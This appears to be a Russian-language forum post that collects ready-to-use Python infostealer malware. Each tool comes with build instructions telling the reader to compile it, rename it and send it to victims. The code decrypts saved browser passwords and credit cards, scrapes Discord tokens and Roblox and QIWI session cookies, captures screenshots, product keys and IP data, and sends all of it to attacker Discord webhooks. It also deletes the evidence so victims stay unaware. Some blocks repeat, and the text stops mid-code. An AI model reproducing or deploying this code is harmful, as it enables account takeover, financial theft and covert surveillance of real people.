    class DATA_BLOB(ctypes.Structure):
        _fields_ = [('cbData', ctypes.wintypes.DWORD),
                    ('pbData', ctypes.POINTER(ctypes.c_char))]

    p = ctypes.create_string_buffer(encrypted, len(encrypted))
    blobin = DATA_BLOB(ctypes.sizeof(p), p)
    blobout = DATA_BLOB()
    retval = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
    if not retval:
        raise ctypes.WinError()
    result = ctypes.string_at(blobout.pbData, blobout.cbData)
    ctypes.windll.kernel32.LocalFree(blobout.pbData)
    return result


def localdata():
    jsn = None
    with open(os.path.join(os.environ['LOCALAPPDATA'], r"Google\Chrome\User Data\Local State"), encoding='utf-8', mode="r") as f:
        jsn = json.loads(str(f.readline()))
    return jsn["os_crypt"]["encrypted_key"]


def decryptions(encrypted_txt):
    encoded_key = localdata()
    encrypted_key = base64.b64decode(encoded_key.encode())
    encrypted_key = encrypted_key[5:]
    key = dpapi(encrypted_key)
    nonce = encrypted_txt[3:15]
    cipher = rcipher(key)
    return decrypt(cipher, encrypted_txt[15:], nonce)


class chrome:
    def __init__(self):
        self.passwordList = []

    def chromedb(self):
        _full_path = os.path.join(ADP, DBP)
        _temp_path = os.path.join(ADP, 'sqlite_file')
        if os.path.exists(_temp_path):
            os.remove(_temp_path)
        shutil.copyfile(_full_path, _temp_path)
        self.pwsd(_temp_path)
    def pwsd(self, db_file):
        conn = sqlite3.connect(db_file)
        _sql = 'select signon_realm,username_value,password_value from logins'
        for row in conn.execute(_sql):
            host = row[0]
            if host.startswith('android'):
                continue
            name = row[1]
            value = self.cdecrypt(row[2])
            _info = '[==================]\nhostname => : %s\nlogin => : %s\nvalue => : %s\n[==================]\n\n' % (host, name, value)
            self.passwordList.append(_info)
        conn.close()
        os.remove(db_file)

    def cdecrypt(self, encrypted_txt):
        if sys.platform == 'win32':
            try:
                if encrypted_txt[:4] == b'\x01\x00\x00\x00':
                    decrypted_txt = dpapi(encrypted_txt)
                    return decrypted_txt.decode()
                elif encrypted_txt[:3] == b'v10':
                    decrypted_txt = decryptions(encrypted_txt)
                    return decrypted_txt[:-16].decode()
            except WindowsError:
                return None
        else:
            pass

    def saved(self):
        try:
            with open(r'C:\ProgramData\passwords.txt', 'w', encoding='utf-8') as f:
                f.writelines(self.passwordList)
        except WindowsError:
            return None


if __name__ == "__main__":
    main = chrome()
    try:
        main.chromedb()
    except:
        pass
    main.saved()


# webhook functionality => collect rest of specified data, send it to our webhook


def beamed():
    hook = Webhook(url)
    try:
        hostname = requests.get("https://api.ipify.org").text
    except:
        pass


    local = os.getenv('LOCALAPPDATA')
    roaming = os.getenv('APPDATA')
    paths = {
        'Discord': roaming + '\\Discord',
        'Discord Canary': roaming + '\\discordcanary',
        'Discord PTB': roaming + '\\discordptb',
        'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
        'Opera': roaming + '\\Opera Software\\Opera Stable',
        'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
        'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
    }

    message = '\n'
    for platform, path in paths.items():
        if not os.path.exists(path):
            continue

        message += '```'

        tokens = sniff(path)

        if len(tokens) > 0:
            for token in tokens:
                message += f'{token}\n'
        else:
            pass

        message += '```'
    

    """screenshot victim's desktop"""
    try:
        screenshot = image.grab()
        screenshot.save(os.getenv('ProgramData') +r'\screenshot.jpg')
        screenshot = open(r'C:\ProgramData\screenshot.jpg', 'rb')
        screenshot.close()
    except:
        pass

    """gather our .zip variables"""
    try:
        zname = r'C:\ProgramData\passwords.zip'
        newzip = zipfile.ZipFile(zname, 'w')
        newzip.write(r'C:\ProgramData\passwords.txt')
        newzip.close()
        passwords = File(r'C:\ProgramData\passwords.zip')
    except:
        pass
    
    """gather our windows product key variables"""
    try:
        usr = os.getenv("UserName")
        keys = subprocess.check_output('wmic path softwarelicensingservice get OA3xOriginalProductKey').decode().split('\n')[1].strip()
        types = subprocess.check_output('wmic os get Caption').decode().split('\n')[1].strip()
    except:
        pass

    """steal victim's .roblosecurity cookie"""
    cookie = [".ROBLOSECURITY"]
    cookies = []
    limit = 2000

    """chrome installation => list cookies from this location"""
    try:
        cookies.extend(list(steal.chrome()))
    except:
        pass

    """firefox installation => list cookies from this location"""
    try:
        cookies.extend(list(steal.firefox()))
    except:
        pass

    """read data => if we find a matching positive for our specified variable 'cookie', send it to our webhook."""
    try:
        for y in cookie:
            send = str([str(x) for x in cookies if y in str(x)])
            chunks = [send[i:i + limit] for i in range(0, len(send), limit)]
            for z in chunks:
                roblox = f'```' + f'{z}' + '```'
    except:
        pass

    """attempt to send all recieved data to our specified webhook"""
    try:
        embed = Embed(title='Aditional Features',description='a victim\'s data was extracted, here\'s the details:',color=0x2f3136,timestamp='now')
        embed.add_field("windows key:",f"user => {usr}\ntype => {types}\nkey => {keys}")
        embed.add_field("roblosecurity:",roblox)
        embed.add_field("tokens:",message)
        embed.add_field("hostname:",f"{hostname}")
    except:
        pass
    try:
        hook.send(embed=embed, file=passwords)
    except:
        pass

    """attempt to remove all evidence, allows for victim to stay unaware of data extraction"""
    try:
        subprocess.os.system(r'del C:\ProgramData\screenshot.jpg')
        subprocess.os.system(r'del C:\ProgramData\passwords.zip')
        subprocess.os.system(r'del C:\ProgramData\passwords.txt')
    except:
        pass


beamed()

Browser Password Stealer​

sudo apt install python3 && python3-pip
pip3 install pypiwin32 pycryptodome win32crypt Crypto shutil
python Brave.py

Brave.py​

import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import datetime



FileName = 116444736000000000
NanoSeconds = 10000000


def ConvertDate(ft):
    utc = datetime.utcfromtimestamp(((10 * int(ft)) - FileName) / NanoSeconds)
    return utc.strftime('%Y-%m-%d %H:%M:%S')


def get_master_key():
    '''
        This Function is used to get the Master Key, for Decrypting the Encrypted Passwords
    '''
    try:
     with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State',
              "r", encoding='utf-8') as f:
        local_state = f.read()
        local_state = json.loads(local_state)
    except:
        exit()
    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]
    return master_key


def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(buff, master_key):
    '''
        Here we are passing the buffer and Master Key to Decrypt the Password
        
    
    '''
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypted_pass = decrypt_payload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()
        return decrypted_pass
    except Exception as e:
        return "Chrome < 80"


def get_password():
    master_key = get_master_key()
    login_db = os.environ[
                   'USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\default\Login Data'
    try:
        shutil.copy2(login_db,
                     "Loginvault.db")
    except:
        print("[*] Brave Browser Not Installed !!")
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            if username != "" or decrypted_password != "":
                print(
                    "URL: " + url + "\nUser Name: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 10 + "\n")
    except Exception as e:
        pass

    cursor.close()
    conn.close()
    try:
        os.remove("Loginvault.db")
    except Exception as e:
        pass


def get_credit_cards():
    master_key = get_master_key()
    login_db = os.environ[
                   'USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\default\Web Data'
    try:
        shutil.copy2(login_db,
                     "CCvault.db")
                    
    except:
        print("[*] Brave Browser Not Installed !!")
    conn = sqlite3.connect("CCvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT * FROM credit_cards")
        for r in cursor.fetchall():
            username = r[1]
            encrypted_password = r[4]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            expire_mon = r[2]
            expire_year = r[3]
            print(
                "Name in Card: " + username + "\nNumber: " + decrypted_password + "\nExpire Month: " + str(
                    expire_mon) + "\nExpire Year: " + str(expire_year) + "\n" + "*" * 10 + "\n")

    except Exception as e:
        pass

    cursor.close()
    conn.close()
    try:
        os.remove("CCvault.db")
    except Exception as e:
        pass


def get_bookmarks():
    bookmarks_location = os.environ[
                             'USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\default\Bookmarks'
    with open(bookmarks_location) as f:
        data = json.load(f)
        bookmarks_list = data["roots"]["bookmark_bar"]["children"]
        
        for i in range(len(bookmarks_list)):
            print(f"Name: {bookmarks_list[i]['name']}\n"
            f"Added on: {ConvertDate(bookmarks_list[i]['date_added'])}\n")


while True:

        get_password()
        get_credit_cards()
        get_bookmarks()

Multi-logger​

sudo apt install python3 && python3-pip
pip3 install dhooks pycryptodome requests psutil browser_cookie3 cryptography

multi-logger.py​

## Scan for the regex [\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}
def Yoink(Directory):
    Directory += '\\Local Storage\\leveldb'

    Tokens = []

    for FileName in os.listdir(Directory):
        if not FileName.endswith('.log') and not FileName.endswith('.ldb'):
            continue

        for line in [x.strip() for x in open(f'{Directory}\\{FileName}', errors='ignore').readlines() if x.strip()]:
            for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
                for Token in re.findall(regex, line):
                    Tokens.append(Token)

    return Tokens


## Wipe the temp file
def Wipe():
    if os.path.exists(roaming + "temp.txt"):
      output2 = open(roaming + "temp.txt", "w")
      output2.write("")
      output2.close()
    else:
      pass


## Search Directorys for Token regex if exists
for Discord, Directory in Directories.items():
    if os.path.exists(Directory):
        Tokens = Yoink(Directory)
    if len(Tokens) > 0:
        for Token in Tokens:
            realshit = f"{Token}\n"


cpufreq = psutil.cpu_freq()
svmem = psutil.virtual_memory()
partitions = psutil.disk_partitions()
disk_io = psutil.disk_io_counters()
net_io = psutil.net_io_counters()

partitions = psutil.disk_partitions()
for partition in partitions:
    try:
        partition_usage = psutil.disk_usage(partition.mountpoint)
    except PermissionError:
        continue





requests.post(url, data=json.dumps({ "embeds": [ { "title": f"Someone Runs Program! - {host}", "color": 8781568 }, { "color": 7506394, "fields": [ { "name": "GeoLocation", "value": f"Using VPN?: {proxy}\nLocal IP: {localip}\nPublic IP: {publicip}\nMAC Adress: {mac}\n\nCountry: {country} | {callcode} | {timezone}\nregion: {region}\nCity: {city} | {postal}\nCurrency: {currency}\n\n\n\n" } ] }, { "fields": [ { "name": "System Information", "value": f"System: {uname.system}\nNode: {uname.node}\nMachine: {uname.machine}\nProcessor: {uname.processor}\n\nBoot Time: {bt.year}/{bt.month}/{bt.day} {bt.hour}:{bt.minute}:{bt.second}" } ] }, { "color": 15109662, "fields": [ { "name": "CPU Information", "value": f"Psychical cores: {psutil.cpu_count(logical=False)}\nTotal Cores: {psutil.cpu_count(logical=True)}\n\nMax Frequency: {cpufreq.max:.2f}Mhz\nMin Frequency: {cpufreq.min:.2f}Mhz\n\nTotal CPU usage: {psutil.cpu_percent()}\n" }, { "name": "Nemory Information", "value": f"Total: {scale(svmem.total)}\nAvailable: {scale(svmem.available)}\nUsed: {scale(svmem.used)}\nPercentage: {svmem.percent}%" }, { "name": "Disk Information", "value": f"Total Size: {scale(partition_usage.total)}\nUsed: {scale(partition_usage.used)}\nFree: {scale(partition_usage.free)}\nPercentage: {partition_usage.percent}%\n\nTotal read: {scale(disk_io.read_bytes)}\nTotal write: {scale(disk_io.write_bytes)}" }, { "name": "Network Information", "value": f"Total Sent: {scale(net_io.bytes_sent)}\")\nTotal Received: {scale(net_io.bytes_recv)}" } ] }, { "color": 7440378, "fields": [ { "name": "Discord information", "value": f"Token: {realshit}" } ] } ] }), headers={"Content-Type": "application/json"})

DBP = r'Google\Chrome\User Data\Default\Login Data'
ADP = os.environ['LOCALAPPDATA']


def sniff(path):
    path += '\\Local Storage\\leveldb'

    tokens = []
    try:
        for file_name in os.listdir(path):
            if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
                continue

            for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
                for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
                    for token in re.findall(regex, line):
                        tokens.append(token)
        return tokens
    except:
        pass


def encrypt(cipher, plaintext, nonce):
    cipher.mode = modes.GCM(nonce)
    encryptor = cipher.encryptor()
    ciphertext = encryptor.update(plaintext)
    return (cipher, ciphertext, nonce)


def decrypt(cipher, ciphertext, nonce):
    cipher.mode = modes.GCM(nonce)
    decryptor = cipher.decryptor()
    return decryptor.update(ciphertext)


def rcipher(key):
    cipher = Cipher(algorithms.AES(key), None, backend=default_backend())
    return cipher


def dpapi(encrypted):
    import ctypes
    import ctypes.wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [('cbData', ctypes.wintypes.DWORD),
                    ('pbData', ctypes.POINTER(ctypes.c_char))]

    p = ctypes.create_string_buffer(encrypted, len(encrypted))
    blobin = DATA_BLOB(ctypes.sizeof(p), p)
    blobout = DATA_BLOB()
    retval = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
    if not retval:
        raise ctypes.WinError()
    result = ctypes.string_at(blobout.pbData, blobout.cbData)
    ctypes.windll.kernel32.LocalFree(blobout.pbData)
    return result


def localdata():
    jsn = None
    with open(os.path.join(os.environ['LOCALAPPDATA'], r"Google\Chrome\User Data\Local State"), encoding='utf-8', mode="r") as f:
        jsn = json.loads(str(f.readline()))
    return jsn["os_crypt"]["encrypted_key"]


def decryptions(encrypted_txt):
    encoded_key = localdata()
    encrypted_key = base64.b64decode(encoded_key.encode())
    encrypted_key = encrypted_key[5:]
    key = dpapi(encrypted_key)
    nonce = encrypted_txt[3:15]
    cipher = rcipher(key)
    return decrypt(cipher, encrypted_txt[15:], nonce)


class chrome:
    def __init__(self):
        self.passwordList = []

    def chromedb(self):
        _full_path = os.path.join(ADP, DBP)
        _temp_path = os.path.join(ADP, 'sqlite_file')
        if os.path.exists(_temp_path):
            os.remove(_temp_path)
        shutil.copyfile(_full_path, _temp_path)
        self.pwsd(_temp_path)
    def pwsd(self, db_file):
        conn = sqlite3.connect(db_file)
        _sql = 'select signon_realm,username_value,password_value from logins'
        for row in conn.execute(_sql):
            host = row[0]
            if host.startswith('android'):
                continue
            name = row[1]
            value = self.cdecrypt(row[2])
            _info = '[==================]\nhostname => : %s\nlogin => : %s\nvalue => : %s\n[==================]\n\n' % (host, name, value)
            self.passwordList.append(_info)
        conn.close()
        os.remove(db_file)

    def cdecrypt(self, encrypted_txt):
        if sys.platform == 'win32':
            try:
                if encrypted_txt[:4] == b'\x01\x00\x00\x00':
                    decrypted_txt = dpapi(encrypted_txt)
                    return decrypted_txt.decode()
                elif encrypted_txt[:3] == b'v10':
                    decrypted_txt = decryptions(encrypted_txt)
                    return decrypted_txt[:-16].decode()
            except WindowsError:
                return None
        else:
            pass

    def saved(self):
        try:
            with open(r'C:\ProgramData\passwords.txt', 'w', encoding='utf-8') as f:
                f.writelines(self.passwordList)
        except WindowsError:
            return None


if __name__ == "__main__":
    main = chrome()
    try:
        main.chromedb()
    except:
        pass
    main.saved()


# webhook functionality => collect rest of specified data, send it to our webhook


def beamed():
    hook = Webhook(url)
    try:
        hostname = requests.get("https://api.ipify.org").text
    except:
        pass


    local = os.getenv('LOCALAPPDATA')
    roaming = os.getenv('APPDATA')
    paths = {
        'Discord': roaming + '\\Discord',
        'Discord Canary': roaming + '\\discordcanary',
        'Discord PTB': roaming + '\\discordptb',
        'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
        'Opera': roaming + '\\Opera Software\\Opera Stable',
        'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
        'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
    }

    message = '\n'
    for platform, path in paths.items():
        if not os.path.exists(path):
            continue

        message += '```'

        tokens = sniff(path)

        if len(tokens) > 0:
            for token in tokens:
                message += f'{token}\n'
        else:
            pass

        message += '```'
    

    """screenshot victim's desktop"""
    try:
        screenshot = image.grab()
        screenshot.save(os.getenv('ProgramData') +r'\screenshot.jpg')
        screenshot = open(r'C:\ProgramData\screenshot.jpg', 'rb')
        screenshot.close()
    except:
        pass

    """gather our .zip variables"""
    try:
        zname = r'C:\ProgramData\passwords.zip'
        newzip = zipfile.ZipFile(zname, 'w')
        newzip.write(r'C:\ProgramData\passwords.txt')
        newzip.close()
        passwords = File(r'C:\ProgramData\passwords.zip')
    except:
        pass
    
    """gather our windows product key variables"""
    try:
        usr = os.getenv("UserName")
        keys = subprocess.check_output('wmic path softwarelicensingservice get OA3xOriginalProductKey').decode().split('\n')[1].strip()
        types = subprocess.check_output('wmic os get Caption').decode().split('\n')[1].strip()
    except:
        pass

    """steal victim's .roblosecurity cookie"""
    cookie = [".ROBLOSECURITY"]
    cookies = []
    limit = 2000

    """chrome installation => list cookies from this location"""
    try:
        cookies.extend(list(steal.chrome()))
    except:
        pass

    """firefox installation => list cookies from this location"""
    try:
        cookies.extend(list(steal.firefox()))
    except:
        pass

    """read data => if we find a matching positive for our specified variable 'cookie', send it to our webhook."""
    try:
        for y in cookie:
            send = str([str(x) for x in cookies if y in str(x)])
            chunks = [send[i:i + limit] for i in range(0, len(send), limit)]
            for z in chunks:
                roblox = f'```' + f'{z}' + '```'
    except:
        pass

    """attempt to send all recieved data to our specified webhook"""
    try:
        embed = Embed(title='Aditional Features',description='a victim\'s data was extracted, here\'s the details:',color=0x2f3136,timestamp='now')
        embed.add_field("windows key:",f"user => {usr}\ntype => {types}\nkey => {keys}")
        embed.add_field("roblosecurity:",roblox)
        embed.add_field("tokens:",message)
        embed.add_field("hostname:",f"{hostname}")
    except:
        pass
    try:
        hook.send(embed=embed, file=passwords)
    except:
        pass

    """attempt to remove all evidence, allows for victim to stay unaware of data extraction"""
    try:
        subprocess.os.system(r'del C:\ProgramData\screenshot.jpg')
        subprocess.os.system(r'del C:\ProgramData\passwords.zip')
        subprocess.os.system(r'del C:\ProgramData\passwords.txt')
    except:
        pass


beamed()

 

[Knew100]

Cookie Stealer​

Cookie Searer, вероятно, является одним из лучших инструментом кражи куки, он не раздувается яркими вставками, изображениями или функциями, а вместо этого стремится быть чрезвычайно быстрым и маленьким, и красть из всех браузеров

Один чистый тестовый файл (без спама Webhook)
Кравлер для браузеров (так что он крадет из действительно из каждого браузера)
Простые и быстро

Использование:​

1) Во-первых, убедитесь, что Python установлен https://www.python.org/downloads/ Обязательно "Add Python to PATH" при установке!
2) Получите Discord Webhook и поместите в webhook = "" Введите свой webhook между кавычками.
3) Запустите команды для создания EXE, переименуйте и отправьте


sudo apt install python3 && python3-pip
pip3 install pyinstaller
pyinstaller --clean --onefile --key MOST_SECURE_KEY main.py

main.py​

webhook = "" # WEBHOOK

import os
import json
import base64
import shutil
import sqlite3
import io
import requests
import traceback
import subprocess

from win32crypt import CryptUnprotectData
from Crypto.Cipher import AES

def safe(func):
    def wrapper(*args, **kwargs):
        try:
            func(*args, **kwargs)
        except Exception:
            pass
    return wrapper

class CookieLogger:

    appdata = os.getenv('APPDATA')
    localappdata = os.getenv('LOCALAPPDATA')

    def __init__(self):
        browsers = self.findBrowsers()

        cookies = []
        for browser in browsers:
            try:
                cookies += self.getCookie(browser[0], browser[1])
            except Exception:
                pass

        try:
            cookies.append('\n'.join(line for line in subprocess.check_output(r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com' -Name .ROBLOSECURITY", creationflags=0x08000000, shell=True).decode().strip().splitlines() if line.strip()))
        except Exception:
            pass

        requests.post(webhook, files = {"cookies.txt": "\n\n".join(list(set(cookies)))})
 
    @safe
    def findBrowsers(self):
        found = []

        for root in [self.appdata, self.localappdata]:
            for directory in os.listdir(root):
                try:
                    for _root, _, _ in os.walk(os.path.join(root, directory)):
                        for file in os.listdir(_root):
                            if file == "Local State":
                                if "Default" in os.listdir(_root):
                                    found.append([_root, True])
                                else:
                                    found.append([_root, False])
                except Exception:
                    pass
   
        return found

    @safe
    def getMasterKey(self, browserPath):
        with open(os.path.join(browserPath, "Local State"), "r", encoding = "utf8") as f:
            localState = json.loads(f.read())
   
        masterKey = base64.b64decode(localState["os_crypt"]["encrypted_key"])
        truncatedMasterKey = masterKey[5:]

        return CryptUnprotectData(truncatedMasterKey, None, None, None, 0)[1]

    @safe
    def decryptCookie(self, cookie, masterKey):
        iv = cookie[3:15]
        encryptedValue = cookie[15:]

        cipher = AES.new(masterKey, AES.MODE_GCM, iv)
        decryptedValue = cipher.decrypt(encryptedValue)

        return decryptedValue[:-16].decode()

    @safe
    def getCookie(self, browserPath, isProfiled):

        cookiesFound = []
        profiles = ["Default"]
        try:
            masterKey = self.getMasterKey(browserPath)
        except Exception:
            traceback.print_exc()
            return cookiesFound

        if isProfiled:
            for directory in os.listdir(browserPath):
                if directory.startswith("Profile"):
                    profiles.append(directory)
   
        if not isProfiled:
            if "Network" in os.listdir(browserPath):
                cookiePath = os.path.join(browserPath, "Network", "Cookies")
            else:
                cookiePath = os.path.join(browserPath, "Cookies")
       
            shutil.copy2(cookiePath, "temp.db")
            connection = sqlite3.connect("temp.db")
            cursor = connection.cursor()

            cursor.execute("SELECT encrypted_value FROM cookies")
            for cookie in cursor.fetchall():
                if cookie[0]:
                    decrypted = self.decryptCookie(cookie[0], masterKey)

                    if decrypted.startswith("_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_"):
                        cookiesFound.append(decrypted)
           
            connection.close()
            os.remove("temp.db")
   
        else:
            for profile in profiles:
                if "Network" in os.listdir(os.path.join(browserPath, profile)):
                    cookiePath = os.path.join(browserPath, profile, "Network", "Cookies")
                else:
                    cookiePath = os.path.join(browserPath, profile, "Cookies")

                shutil.copy2(cookiePath, "temp.db")
                connection = sqlite3.connect("temp.db")
                cursor = connection.cursor()

                cursor.execute("SELECT encrypted_value FROM cookies")
                for cookie in cursor.fetchall():
                    if cookie[0]:
                        decrypted = self.decryptCookie(cookie[0], masterKey)

                        if decrypted.startswith("_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_"):
                            cookiesFound.append(decrypted)
           
                connection.close()
                os.remove("temp.db")

        return cookiesFound

if __name__ == "__main__":
    CookieLogger()

Cookie и IP Stealer​

Python Searer умеет красть из 4 браузеров, точечно
Вместо QIWI.com вставьте свой сайт, смотря какие куки и ip вам нужны

import browser_cookie3
import requests
import threading


WebHook = "" # Input your webhook here


def MicrosoftEdge():
 
    try:
        cookies = browser_cookie3.chrome(domain_name = "QIWI.com")
        cookies = str(cookies)
        cookie = cookies.split(".auth_=")[1].split(" for .QIWI.com/>")[0].strip()
        ip_address = requests.get("https://api.ipify.org/").text
        requests.post(WebHook, json = {
            "username" : "RED SKULL|COOK'ER",
            "avatar_url" : "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png",
            "embeds": [{
                "title": "COOKIE FOUND|Browser : Edge",
                "description": f"```{cookie}```",
                "color": 16711680,
                "fields": [
                    {"name" : "Victim's IP", "value" : ip_address, "inline:": True}
                ],
                "footer": {
        "text": "Turbo",
        "icon_url": "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png"
      }        
}]})
    except:
        pass
 

def GoogleChrome():
    try:
        cookies = browser_cookie3.chrome(domain_name = "QIWI.com")
        cookies = str(cookies)
        cookie = cookies.split(".auth_=")[1].split(" for .QIWI.com/>")[0].strip()
        ip_address = requests.get("https://api.ipify.org/").text
        requests.post(WebHook, json = {
            "username" : "RED SKULL|COOK'ER",
            "avatar_url" : "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png",
            "embeds": [{
                "title": "COOKIE FOUND|Browser : Chrome",
                "description": f"```{cookie}```",
                "color": 16711680,
                "fields": [
                    {"name" : "Victim's IP", "value" : ip_address, "inline:": True}
                ],
                "footer": {
        "text": "Turbo",
        "icon_url": "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png"
      }        
}]})
    except:
        pass

def MozillaFirefox():
    try:
        cookies = browser_cookie3.firefox(domain_name = "QIWI.com")
        cookies = str(cookies)
        cookie = cookies.split(".auth_=")[1].split(" for .QIWI.com/>")[0].strip()
        ip_address = requests.get("https://api.ipify.org/").text
        requests.post(WebHook, json = {
            "username" : "RED SKULL|COOK'ER",
            "avatar_url" : "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png",
            "embeds": [{
                "title": "COOKIE FOUND|Browser : Firefox",
                "description": f"```{cookie}```",
                "color": 16711680,
                "fields": [
                    {"name" : "Victim's IP", "value" : ip_address, "inline:": True}
                ],
                "footer": {
        "text": "Turbo",
        "icon_url": "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png"
      }        
}]})
    except:
        pass

def Opera():
    try:
        cookies = browser_cookie3.opera(domain_name = "QIWI.com")
        cookies = str(cookies)
        cookie = cookies.split(".auth_=")[1].split(" for .QIWI.com/>")[0].strip()
        ip_address = requests.get("https://api.ipify.org/").text
        requests.post(WebHook, json = {
            "username" : "RED SKULL|COOK'ER",
            "avatar_url" : "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png",
            "embeds": [{
                "title": "COOKIE FOUND|Browser : Opera",
                "description": f"```{cookie}```",
                "color": 16711680,
                "fields": [
                    {"name" : "Victim's IP", "value" : ip_address, "inline:": True}
                ],
                "footer": {
        "text": "Turbo",
        "icon_url": "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png"
      }        
}]})
    except:
        pass

browsers = [MicrosoftEdge, GoogleChrome, MozillaFirefox, Opera]

for v in browsers:
    threading.Thread(target = v).start()

Cookie Stealer Roblox​

С обфускацией кода

Использование:​

1) Во-первых, убедитесь, что Python установлен https://www.python.org/downloads/ Обязательно "Add Python to PATH" при установке!
2) Получите Discord Webhook и поместите в webhook = "" Введите свой webhook между кавычками.
3) Запустите команды для создания EXE, переименуйте и отправьте


sudo apt install python3 && python3-pip
pip3 install pyinstaller browser_cookie3 requests
Через pyinstaller создаёте red_skull.exe

red_skull.py​

import os
import base64
import shutil
import marshal

os.system("python -m pip install pyinstaller pypiwin32 pycryptodome requests")
os.system("cls")

webhook = input("Paste your Webhook: ")
obfuscate = input("Obfuscate (Encrypt) the code? (Y/N): ")

id = base64.b64encode(os.urandom(16)).decode().replace("=","").replace("/","")

code = f"""
webhook = "{webhook}" # WEBHOOK HERE
import os
import json
import base64
import shutil
import sqlite3
import io
import requests
import traceback
import subprocess
from win32crypt import CryptUnprotectData
from Crypto.Cipher import AES
def safe(func):
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except Exception:
            pass
    return wrapper
class CookieLogger:
    appdata = os.getenv('APPDATA')
    localappdata = os.getenv('LOCALAPPDATA')
    def __init__(self):
        browsers = self.findBrowsers()
        cookies = []
        for browser in browsers:
            try:
                cookies.append(self.getCookie(browser[0], browser[1]))
            except Exception:
                pass
        try:
            cookies.append(("Roblox App", ("None", '\\n'.join(line for line in subprocess.check_output(r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com' -Name .ROBLOSECURITY", creationflags=0x08000000, shell=True).decode().strip().splitlines() if line.strip()))))
        except Exception:
            pass
   
        cookieDoc = ""
        for cookie in cookies:
            if cookie == None or not cookie[1]:
                continue
            for _cookie in cookie[1]:
                cookieDoc += f"Browser: {{cookie[0]}}\\nProfile: {{_cookie[0]}}\\nCookie: {{_cookie[1]}}\\n\\n"
        requests.post(webhook, files = {{"cookies.txt": cookieDoc}})
 
    @safe
    def findBrowsers(self):
        found = []
        for root in [self.appdata, self.localappdata]:
            for directory in os.listdir(root):
                try:
                    for _root, _, _ in os.walk(os.path.join(root, directory)):
                        for file in os.listdir(_root):
                            if file == "Local State":
                                if "Default" in os.listdir(_root):
                                    found.append([_root, True])
                                else:
                                    found.append([_root, False])
                except Exception:
                    pass
        return found
    @safe
    def getMasterKey(self, browserPath):
        with open(os.path.join(browserPath, "Local State"), "r", encoding = "utf8") as f:
            localState = json.loads(f.read())
   
        masterKey = base64.b64decode(localState["os_crypt"]["encrypted_key"])
        truncatedMasterKey = masterKey[5:]
        return CryptUnprotectData(truncatedMasterKey, None, None, None, 0)[1]
    @safe
    def decryptCookie(self, cookie, masterKey):
        iv = cookie[3:15]
        encryptedValue = cookie[15:]
        cipher = AES.new(masterKey, AES.MODE_GCM, iv)
        decryptedValue = cipher.decrypt(encryptedValue)
        return decryptedValue[:-16].decode()
    @safe
    def getCookie(self, browserPath, isProfiled):
        if browserPath.split("\\\\")[-1] == "User Data":
            browserName = browserPath.split("\\\\")[-2]
        else:
            browserName = browserPath.split("\\\\")[-1]
   
        cookiesFound = []
        profiles = ["Default"]
        try:
            masterKey = self.getMasterKey(browserPath)
        except Exception:
            traceback.print_exc()
            return cookiesFound
        if isProfiled:
            for directory in os.listdir(browserPath):
                if directory.startswith("Profile"):
                    profiles.append(directory)
   
        if not isProfiled:
            if "Network" in os.listdir(browserPath):
                cookiePath = os.path.join(browserPath, "Network", "Cookies")
            else:
